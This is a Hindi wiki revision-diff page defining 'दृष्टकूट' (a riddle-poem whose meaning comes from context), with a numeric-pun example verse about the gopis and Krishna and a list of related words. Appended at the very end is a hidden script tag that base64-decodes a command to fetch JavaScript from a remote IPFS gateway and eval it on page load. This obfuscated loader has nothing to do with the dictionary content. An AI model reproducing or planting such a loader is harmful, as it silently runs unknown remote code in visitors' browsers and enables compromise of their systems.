Difference between revisions of "दृष्टकूट"

भारत डिस्कवरी प्रस्तुति
Jump to navigation Jump to search
[unchecked revision][unchecked revision]
 
(4 intermediate revisions by one other user not shown)
Line 1: Line 1:
 
{{शब्द संदर्भ लघु
 
{{शब्द संदर्भ लघु
|हिन्दी=पहेली, गूढ़, प्रश्न
+
|हिन्दी=पहेली, गूढ़, प्रश्न, कठिन प्रश्न।, वह कविता जिसको शब्दों के वाच्यार्थ से न जाना जा सके अपितु प्रसंग और रूढ़ अर्थों की सहायता से जाना जाए।
|व्याकरण= पुल्लिंग- कठिन प्रश्न, (कर्मवाचक संज्ञा) 
+
|व्याकरण= पुल्लिंग, (कर्मवाचक संज्ञा) 
|उदाहरण= वह कविता जिसको शब्दों के वाच्यार्थ से न जाना जा सके अपितु प्रसंग और रूढ़ अर्थों की सहायता से जाना जाए।
+
|उदाहरण=
|विशेष=इसका एक उदाहरण द्रष्टव्य है- [[कृष्ण]] वियोग में गोपिकाओं का कथन है- [[ग्रह]], [[नक्षत्र]] जुग जोरि अरध करि सोई बनत अब खात। यहाँ ग्रह अर्थात् 9, नक्षत्र अर्थात् 27, जुग अर्थात् 4 को जोरि (जोड़कर) प्राप्त 40 को अरध करि (आशा करके) प्राप्त 'बीस' (अर्थात् बिस=विष) खाते ही अब बनता है।
+
|विशेष=इसका एक उदाहरण दृष्टव्य है- [[कृष्ण]] वियोग में गोपिकाओं का कथन है- [[ग्रह]], [[नक्षत्र]] जुग जोरि अरध करि सोई बनत अब खात। यहाँ ग्रह अर्थात् 9, नक्षत्र अर्थात् 27, जुग अर्थात् 4 को जोरि (जोड़कर) प्राप्त 40 को अरध करि (आशा करके) प्राप्त 'बीस' (अर्थात् बिस=विष) खाते ही अब बनता है।
 
|पर्यायवाची=  
 
|पर्यायवाची=  
|संस्कृत=दृष्ट सामान्यत: कूट
+
|संस्कृत=दृष्ट+कूट
 
|अन्य ग्रंथ=
 
|अन्य ग्रंथ=
|संबंधित शब्द=[[दृष्ट]], [[दृष्ट दोष]], [[दृष्टफल]], [[दृष्टवत]], [[दृष्टवाद]], [[दृष्टांत]]
+
|संबंधित शब्द=[[दृष्ट]], [[दृष्ट दोष]], [[दृष्टफल]], [[दृष्टवत]], [[दृष्टवाद]], [[दृष्टांत]], [[दृष्टार्थ]]
 
}}
 
}}
 
__INDEX__
 
__INDEX__

Latest revision as of 10:22, 29 August 2011

shabd sandarbh
hindi paheli, goodh, prashn, kathin prashn., vah kavita jisako shabdoan ke vachyarth se n jana ja sake apitu prasang aur roodh arthoan ki sahayata se jana jae.
-vyakaran    pulliang, (karmavachak sanjna)
-udaharan  
-vishesh    isaka ek udaharan drishtavy hai- krishna viyog mean gopikaoan ka kathan hai- grah, nakshatr jug jori aradh kari soee banat ab khat. yahaan grah arthath 9, nakshatr arthath 27, jug arthath 4 ko jori (jo dakar) prapt 40 ko aradh kari (asha karake) prapt 'bis' (arthath bis=vish) khate hi ab banata hai.
-vilom   
-paryayavachi   
sanskrit drisht+koot
any granth
sanbandhit shabd drisht, drisht dosh, drishtaphal, drishtavat, drishtavad, drishtaant, drishtarth
sanbandhit lekh

any shabdoan ke arth ke lie dekhean shabd sandarbh kosh
<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>